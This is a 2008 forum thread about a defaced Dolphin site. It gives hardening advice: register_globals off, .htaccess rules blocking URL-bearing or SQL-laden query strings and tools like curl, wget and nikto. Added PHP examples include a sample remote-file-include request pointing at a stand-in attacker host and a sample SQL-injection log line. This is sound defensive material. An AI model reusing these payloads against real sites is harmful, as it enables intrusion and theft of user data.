Index.php keeps getting hacked. Please help

wowheaded posted 2nd of October 2008 in Community Voice. 13 comments.

Hi guys and girls,

 

Thanks for all the help with the previous problem. I did as suggested and the site is now working as it should again.

 

Just got one other little problem now. I've been hacked twice in the space of 2 weeks. It's not really a bad hack as such, but some idiots are getting in and replacing my index.php file with their stupid little "U Been Haxed By...." rubbish. Obviously, it's easy to fix the initial hack, but how do I stop this from happening again and again?

 

I've changed the PW's to my admin and hosting account, and will have to do that again today.

 

Is there any inclusions I need to make into the files to stop this again? Do I need to alter any permissions? Any ideas what to do?

 

Thanks in advance!

 
Comments
wowheaded
I've just added the code:
if (isset($_REQUEST['dir']))
die ('Hacking attempt');
to the files Sammie suggested in another post. I'm hoping this will help some.

Is there anything else I should do?
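An added illustration (my code, not from the thread and not Dolphin's own code) of what the `$_REQUEST['dir']` check above defends against, and why the register_globals setting that comes up later in the thread is the real fix. Everything in it is constructed: the include shape is the classic pattern such checks target, not a claim about any specific Dolphin file; the path `/var/www/dolphin`, the module names and the function names are the example's own.

```php
<?php
// Added example for this thread (not Dolphin's code). It shows what the
// $_REQUEST['dir'] check defends against and why register_globals is the
// root cause. The include shape below is the classic pattern such checks
// target; that any particular Dolphin file looks like this is an assumption.

// With register_globals=On PHP imported every request variable into the
// script's symbol table before a line of its own code ran. This function
// stands in for that behaviour so the effect can be shown in one script.
function emulate_register_globals(array $request)
{
    return $request; // what the script would see as $dir, $page, ...
}

// Vulnerable shape (hypothetical): $dir is meant to come from configuration
// but is never assigned, so under register_globals the URL chooses the
// include. With allow_url_fopen on (and, from PHP 5.2, allow_url_include on)
// include() then fetches and runs a file from the attacker's server.
function vulnerable_include_target(array $vars)
{
    $dir = isset($vars['dir']) ? $vars['dir'] : '';
    return $dir . '/inc/header.inc.php';
}

// Hardened shape: refuse any request that tries to set the variable (the
// quick patch from the thread, raised as an exception here instead of
// die()), build the path from a constant, and let the user choose only
// from an allow-list.
function hardened_include_target(array $request, $base = '/var/www/dolphin')
{
    if (isset($request['dir'])) {
        throw new RuntimeException('Hacking attempt');
    }
    return $base . '/inc/header.inc.php';
}

function choose_module($name, array $allowed = array('photos', 'music', 'videos'))
{
    // Strict comparison, so "0" or a traversal string never slips through.
    return in_array($name, $allowed, true) ? $name : 'photos';
}

// Constructed attacker request. The trailing "?" turns everything the
// script appends into a query string on the attacker's server, so the
// remote file is fetched exactly as hosted.
$attack = array('dir' => 'http://203.0.113.9/shell.txt?');

$vars = emulate_register_globals($attack);
echo "vulnerable include target: ", vulnerable_include_target($vars), "\n";

try {
    hardened_include_target($attack);
} catch (RuntimeException $e) {
    echo "hardened: refused (", $e->getMessage(), ")\n";
}
echo "hardened include target: ", hardened_include_target(array()), "\n";
echo "module for '../../etc/passwd': ", choose_module('../../etc/passwd'), "\n";
```

Run it with `php example.php`. Two placement details matter when you apply the real setting: `register_globals` is a PHP_INI_PERDIR directive, so `php_flag register_globals Off` in .htaccess works when PHP runs as an Apache module, but if PHP runs as CGI/FastCGI Apache does not know `php_flag` at all and the line produces a server error; there it belongs in php.ini. `allow_url_fopen` is PHP_INI_SYSTEM, so `php_value allow_url_fopen 0` in .htaccess is ignored and has to go in php.ini or httpd.conf.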
wowheaded
Just to let you know, this is the hacker's name: Arianom De HackeR

This is the IP it came from: 193.67.33.2

You might want to block it.

Also, what's with the /ray/crossdomain.xml file? Could this be a potential security issue?
sammie
That fix will stop them. The crossdomain file is just a file to allow Flash to be used from one domain to another; without it you can't see Flash from other sites.

Get hosted on safer servers.
AndreyP
Again and again: php_flag register_globals Off :-)
Better if not just via .htaccess but at host level.
Second, disable all possible script or Flash includes (better, any HTML).
Third, this was a good solution too:

#RewriteCond %{QUERY_STRING} ^http [OR]
#RewriteCond %{QUERY_STRING} ^.+www\. [OR]
#RewriteCond %{QUERY_STRING} ^.+https [OR]
#RewriteCond %{QUERY_STRING} ^.+ftp
#RewriteRule .* - [L,F]
#RewriteCond %{HTTP_USER_AGENT} ^libwww [OR]
#RewriteCond %{HTTP_USER_AGENT} ^Wget
#RewriteRule .* - [F]

#RewriteCond %{QUERY_STRING} (.*)=http(.*) [NC,OR]
#RewriteCond %{QUERY_STRING} (.*)urlx=(.*) [NC]
#RewriteRule ^(.*) - [F]

and even php_value allow_url_fopen 0 :-)
wowheaded
Thanks for the feedback. I seem to have a lot of trouble with my hosting at the moment, which is bad seeing as it is linked to a number of other sites I own. Being evasive about what and why, but as nothing seems to be safe right now, it's best to say little.

I'm actually considering adding sites to an additional hosting company, even though the one we currently use is listed on the Boonex server page here. I noticed today that a number of functions over all the websites are messed up from the cPanel access, and according to the company, it's a corruption at their end.
wowheaded
Also, with :

php_flag register_globals Off

Where do I change this specifically?

This is my first major dabble with php and mysql, so I'm not sure. CSS/XHTML/XML, I'm fine...PHP...you've lost me:D
LeonidS
This command should be placed in the .htaccess file in the root Dolphin directory.
sammie
If you are on shared hosting and register_globals is on by default at the server level, and your PHP is 4.3.2 or later, then your hosting provider has broken php.net's recommended setting of register_globals off and has even changed the default setting to On.

This allows any site on that server to be exploited and gain full access to all sites and accounts on that server. This is your hosting company's fault, and their blatant abuse of their customers' trust in not providing safe, secure hosting by following php.net's recommended settings for register_globals.
Tallyplayer
Also wowhead, look in your cache and backup directories specifically. All this security you are setting up may be locking the door after the thief is already in the store. When my sites were hacked they did pretty much what you described, I guess to stop me from looking deeper. If they were in then they probably already have set up the scripts somewhere to let them keep coming back. Although DosDawg helped me lock the door on my old hosting, they already had a key to the backdoor. End solution, I had to completely move off my poor hosting environment, moved in with Dos and Sammie, and they keep all the door to door salesmen away!
wowheaded
Hi both,

I've just looked at my cache and backup directories. Both of those are absolutely fine, from what I can see. They both seem to have the relevant files included and no abnormalities in there. That's one big relief.

Right now, I'm going through all the files and folders in my hosting and comparing them to the dolphin/ray/orc unzipped files. I'll post if I find something odd that I just can't figure out :).

With regards to my hosting, I actually have a reseller account with this company listed within the Boonex site. I'll email them again today and ask them what the deal is with the register_globals issue. I noticed that even though we're supposed to have access to a number of additional features with them to control our hosting plan, we actually don't.
gameutopia
As AndreyP mentions these are good ideas, however the commands to add to .htaccess he specifies will do absolutely no good because they are commented out with the #.

Basically if you add a # to your .htaccess, each line with the # is ignored and does no good. So I don't know why this was even posted or why it wasn't clarified that you need to remove the # for it to do any good and take effect. Guess everyone is supposed to know that by default.

#RewriteCond %{QUERY_STRING} ^http [OR]
#RewriteCond %{QUERY_STRING} ^.+www\. [OR]
#RewriteCond %{QUERY_STRING} ^.+https [OR]
#RewriteCond %{QUERY_STRING} ^.+ftp
#RewriteRule .* - [L,F]
#RewriteCond %{HTTP_USER_AGENT} ^libwww [OR]
#RewriteCond %{HTTP_USER_AGENT} ^Wget
#RewriteRule .* - [F]

#RewriteCond %{QUERY_STRING} (.*)=http(.*) [NC,OR]
#RewriteCond %{QUERY_STRING} (.*)urlx=(.*) [NC]
#RewriteRule ^(.*) - [F]

and even php_value allow_url_fopen 0 :-)

I haven't tested it fully; you will have to remove the:
and even php_value allow_url_fopen 0 :-)

and all the #'s for it to work at all. If you were to use this command in .htaccess it would be more like:
RewriteCond %{QUERY_STRING} ^http [OR]
RewriteCond %{QUERY_STRING} ^.+www\. [OR]
RewriteCond %{QUERY_STRING} ^.+https [OR]
RewriteCond %{QUERY_STRING} ^.+ftp
RewriteRule .* - [L,F]
RewriteCond %{HTTP_USER_AGENT} ^libwww [OR]
RewriteCond %{HTTP_USER_AGENT} ^Wget
RewriteRule .* - [F]

RewriteCond %{QUERY_STRING} (.*)=http(.*) [NC,OR]
RewriteCond %{QUERY_STRING} (.*)urlx=(.*) [NC]
RewriteRule ^(.*) - [F]

all your other dolphin .htaccess code would follow here!!

I wouldn't be surprised if some of this made certain things not work, specifically your share files in your media locations, such as when you click on your share link in the photo, music, and video gallery in the actions menu. The above code will block it. Is this all bad? I don't know. But it will piss some off. Either that, or if you use the above code you will have to remove the share link to do away with it.

The code I use is similar to the Boonex guys' except mine already has the #'s removed so they do work:
Options -MultiViews
Options -Indexes
<IfModule mod_rewrite.c>
RewriteEngine on
# Referer carrying injection characters, or a query string carrying a URL
# (remote file inclusion attempts) or SQL injection characters/keywords.
# Every condition in this group needs [OR] except the last one: a condition
# without [OR] is ANDed with the one that follows it, and an [OR] on the last
# condition of a rule makes that condition irrelevant.
RewriteCond %{HTTP_REFERER} ^(.*)(<|>|'|%0A|%0D|%27|%3C|%3E|%00).* [NC,OR]
RewriteCond %{QUERY_STRING} ^http [OR]
RewriteCond %{QUERY_STRING} ^.+www\. [OR]
RewriteCond %{QUERY_STRING} ^.+https [OR]
RewriteCond %{QUERY_STRING} ^.+\.txt [OR]
RewriteCond %{QUERY_STRING} ^.+ftp [OR]
RewriteCond %{QUERY_STRING} ^.*(;|<|>|'|"|\)|%0A|%0D|%22|%27|%3C|%3E|%00).*(/\*|union|select|insert|cast|set|declare|drop|update|md5|benchmark).* [NC]
RewriteRule .* - [L,F]
# Common scanner / download-tool user agents
RewriteCond %{HTTP_USER_AGENT} ^libwww [OR]
RewriteCond %{HTTP_USER_AGENT} ^.*(libwww-perl|curl|wget|python|nikto|scan).* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Wget
RewriteRule .* - [F]
</IfModule>


I also block a number of things such as .htaccess, so you can't view my .htaccess files, and I also block certain countries. I do block the periodic file, and I also block file types that can be uploaded to audio/video like php, txt, vbs, cgi, pl, etc., you name it. Anything that is out of the ordinary can't even be uploaded to the dolphin/ray folders to begin with.

Good luck.
Gameutopia
I will post my Boonex profile until I am told not to. Seems legit to me since it is hosted on Boonex, right?
http://www.boonex.com/unity/gameutopia
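As an added example (my code, not from gameutopia's post and not from Boonex), here are the RewriteCond tests from the .htaccess above re-implemented as PCRE patterns and run over constructed Apache combined-log lines. It is useful for deciding what the rules will block, and break, before switching them on, and for triaging an access log after a defacement to see which request carried the payload. The log lines, IP addresses (documentation ranges), paths, table and parameter names are all made up for the example.

```php
<?php
// Added example for this thread, not Dolphin code and not the .htaccess
// itself. It re-implements the RewriteCond tests from gameutopia's block as
// PCRE patterns and runs them over constructed Apache combined-log lines,
// so you can see what the rules would block (and break) before enabling
// them, and use the same patterns to triage an access log after a defacement.

// Rules mirrored from the .htaccess above: the field they inspect, a label,
// and the regex. mod_rewrite tests the RAW query string (no URL decoding),
// which is why the originals list both ' and %27; the raw strings are used here.
function rewrite_rules()
{
    return array(
        array('query',   'query-starts-with-http', '/^http/'),
        array('query',   'url-inside-query',       '/^.+(www\.|https|ftp|\.txt)/'),
        array('query',   'param-set-to-url',       '/=http|urlx=/i'),
        array('query',   'sql-injection',
              '/(;|<|>|\'|"|\)|%0A|%0D|%22|%27|%3C|%3E|%00).*(\/\*|union|select|insert|cast|set|declare|drop|update|md5|benchmark)/i'),
        array('referer', 'referer-injection',      '/(<|>|\'|%0A|%0D|%27|%3C|%3E|%00)/i'),
        array('agent',   'scanner-user-agent',     '/libwww-perl|curl|wget|python|nikto|scan/i'),
    );
}

// Parse one Apache "combined" log line into its fields; null if it does not parse.
function parse_combined_line($line)
{
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "([^"]*)"$/';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    $parts = explode('?', $m[4], 2);
    return array(
        'ip'      => $m[1],
        'time'    => $m[2],
        'method'  => $m[3],
        'path'    => $parts[0],
        'query'   => isset($parts[1]) ? $parts[1] : '',
        'status'  => (int) $m[5],
        'referer' => $m[6],
        'agent'   => $m[7],
    );
}

// Labels of every rule the request would trip; an empty array means it passes.
function matched_rules(array $req)
{
    $hits = array();
    foreach (rewrite_rules() as $rule) {
        list($field, $label, $pattern) = $rule;
        if ($req[$field] !== '' && preg_match($pattern, $req[$field])) {
            $hits[] = $label;
        }
    }
    return $hits;
}

function scan_log($log)
{
    $out = array();
    foreach (preg_split('/\r?\n/', trim($log)) as $line) {
        $req = parse_combined_line($line);
        if ($req !== null) {
            $req['blocked_by'] = matched_rules($req);
            $out[] = $req;
        }
    }
    return $out;
}

// Constructed sample log (203.0.113.0/24 and 198.51.100.0/24 are
// documentation ranges; none of this is from the poster's server).
$sample_log = <<<'LOG'
203.0.113.5 - - [02/Oct/2008:03:14:07 +0000] "GET /index.php?dir=http://203.0.113.9/x.txt? HTTP/1.1" 200 512 "-" "libwww-perl/5.805"
203.0.113.5 - - [02/Oct/2008:03:14:09 +0000] "GET /index.php?dir=ftp://203.0.113.9/x.txt HTTP/1.1" 200 512 "-" "Wget/1.10.2"
198.51.100.7 - - [02/Oct/2008:09:01:00 +0000] "GET /photos/index.php?action=share&url=http://www.example.com/ HTTP/1.1" 200 4096 "http://www.example.com/" "Mozilla/5.0"
198.51.100.8 - - [02/Oct/2008:09:02:30 +0000] "GET /profile.php?ID=12 HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
198.51.100.9 - - [02/Oct/2008:09:03:11 +0000] "GET /search.php?keyword=1%27+UNION+SELECT+Password+FROM+Users-- HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
198.51.100.10 - - [02/Oct/2008:09:04:45 +0000] "GET /search.php?keyword=don%27t+reset+it HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
LOG;

foreach (scan_log($sample_log) as $r) {
    $target = $r['path'] . ($r['query'] !== '' ? '?' . $r['query'] : '');
    printf("%-14s %-70.70s %s\n", $r['ip'], $target,
        $r['blocked_by'] ? 'BLOCK ' . implode(',', $r['blocked_by']) : 'pass');
}
```

Run it with `php scan.php`, or swap `$sample_log` for `file_get_contents('/path/to/access_log')` to triage a real log. The first two lines are the remote-include shape the thread is defending against and are caught by both the URL rules and the user-agent rule. Lines 3 and 6 are the cost gameutopia warns about: a legitimate share link trips the URL rules, and an innocent apostrophe followed by the letters "set" (inside "reset") trips the SQL rule, so both get a 403. The rules also only ever see the raw, undecoded query string, so `dir=%68ttp://...` passes them while PHP still decodes it to `http://`; treat them as a tripwire and a log-triage aid, not as a substitute for register_globals Off and allow_url_fopen Off.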
billabongrob
Sammie, you do realize that you can turn off register globals in the .htaccess file, right?
robertsearle
Yes you can, however, that only turns it off on that one website in a shared hosting environment.

I believe the server can be configured as to what is allowed in the local .htaccess files.

As mentioned, once a site is hacked all sites on the server are accessible. Even if your hostheader website is protected it is accessible from another website on the same server. It really needs turned off at the server level or you should consider changing your hosting provider.

If register globals can be turned off, it is reasonable to assume register globals can be turned on. So one hostheader/virtual website can compromise security for the rest of the shared hosting server.

I just left my last hosting company because a poorly written ComDEV photo album application kept getting exploited. It turned out my clients competitor signed up for multiple accounts until they landed on the same server their site was on.